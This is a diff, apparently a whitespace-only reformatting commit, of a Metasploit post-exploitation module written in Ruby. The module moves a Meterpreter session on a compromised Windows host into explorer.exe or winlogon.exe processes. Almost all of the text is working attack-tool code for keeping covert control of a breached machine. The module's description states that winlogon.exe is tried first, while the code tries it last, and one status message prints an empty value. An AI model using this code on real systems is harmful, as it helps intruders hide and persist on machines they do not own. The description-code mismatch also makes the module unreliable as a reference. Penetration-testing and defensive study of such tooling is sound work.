|
10 | 10 |
|
11 | 11 | class Metasploit3 < Msf::Post
|
12 | 12 |
|
13 |
| - def initialize(info={}) |
14 |
| - super( update_info( info, |
15 |
| - 'Name' => 'Windows Manage Smart Process Migration', |
16 |
| - 'Description' => %q{ This module will migrate a Meterpreter session. |
17 |
| - It will first attempt to migrate to winlogon.exe . If that fails it will |
18 |
| - then look at all of the explorer.exe processes. If there is one that exists |
19 |
| - for the user context the session is already in it will try that. Failing that it will fall back |
20 |
| - and try any other explorer.exe processes it finds}, |
21 |
| - 'License' => MSF_LICENSE, |
22 |
| - 'Author' => [ 'thelightcosine'], |
23 |
| - 'Platform' => [ 'win' ], |
24 |
| - 'SessionTypes' => [ 'meterpreter' ] |
25 |
| - )) |
| 13 | + def initialize(info={}) |
| 14 | + super( update_info( info, |
| 15 | + 'Name' => 'Windows Manage Smart Process Migration', |
| 16 | + 'Description' => %q{ This module will migrate a Meterpreter session. |
| 17 | + It will first attempt to migrate to winlogon.exe . If that fails it will |
| 18 | + then look at all of the explorer.exe processes. If there is one that exists |
| 19 | + for the user context the session is already in it will try that. Failing that it will fall back |
| 20 | + and try any other explorer.exe processes it finds}, |
| 21 | + 'License' => MSF_LICENSE, |
| 22 | + 'Author' => [ 'thelightcosine'], |
| 23 | + 'Platform' => [ 'win' ], |
| 24 | + 'SessionTypes' => [ 'meterpreter' ] |
| 25 | + )) |
26 | 26 |
|
27 | 27 |
|
28 |
| - end |
| 28 | + end |
29 | 29 |
|
30 |
| - def run |
31 |
| - server = client.sys.process.open |
32 |
| - original_pid = server.pid |
33 |
| - print_status("Current server process: #{server.name} (#{server.pid})") |
| 30 | + def run |
| 31 | + server = client.sys.process.open |
| 32 | + original_pid = server.pid |
| 33 | + print_status("Current server process: #{server.name} (#{server.pid})") |
34 | 34 |
|
35 |
| - uid = client.sys.config.getuid |
| 35 | + uid = client.sys.config.getuid |
36 | 36 |
|
37 |
| - processes = client.sys.process.get_processes |
| 37 | + processes = client.sys.process.get_processes |
38 | 38 |
|
39 |
| - uid_explorer_procs = [] |
40 |
| - explorer_procs = [] |
41 |
| - winlogon_procs = [] |
42 |
| - processes.each do |proc| |
43 |
| - uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid |
44 |
| - explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid |
45 |
| - winlogon_procs << proc if proc['name'] == "winlogon.exe" |
46 |
| - end |
| 39 | + uid_explorer_procs = [] |
| 40 | + explorer_procs = [] |
| 41 | + winlogon_procs = [] |
| 42 | + processes.each do |proc| |
| 43 | + uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid |
| 44 | + explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid |
| 45 | + winlogon_procs << proc if proc['name'] == "winlogon.exe" |
| 46 | + end |
47 | 47 |
|
48 | 48 | print_status "Attempting to move into explorer.exe for current user..."
|
49 |
| - uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
| 49 | + uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
50 | 50 | print_status "Attempting to move into explorer.exe for other users..."
|
51 |
| - explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
| 51 | + explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
52 | 52 | print_status "Attempting to move into winlogon.exe"
|
53 | 53 | winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
|
54 | 54 |
|
55 |
| - print_error "Was unable to sucessfully migrate into any of our likely candidates" |
56 |
| - end |
| 55 | + print_error "Was unable to sucessfully migrate into any of our likely candidates" |
| 56 | + end |
57 | 57 |
|
58 | 58 |
|
59 |
| - def attempt_migration(target_pid) |
60 |
| - begin |
61 |
| - print_good("Migrating to #{target_pid}") |
62 |
| - client.core.migrate(target_pid) |
63 |
| - print_good("Successfully migrated to process #{}") |
64 |
| - return true |
65 |
| - rescue ::Exception => e |
66 |
| - print_error("Could not migrate in to process.") |
67 |
| - print_error(e.to_s) |
68 |
| - return false |
69 |
| - end |
70 |
| - end |
| 59 | + def attempt_migration(target_pid) |
| 60 | + begin |
| 61 | + print_good("Migrating to #{target_pid}") |
| 62 | + client.core.migrate(target_pid) |
| 63 | + print_good("Successfully migrated to process #{}") |
| 64 | + return true |
| 65 | + rescue ::Exception => e |
| 66 | + print_error("Could not migrate in to process.") |
| 67 | + print_error(e.to_s) |
| 68 | + return false |
| 69 | + end |
| 70 | + end |
71 | 71 | end
|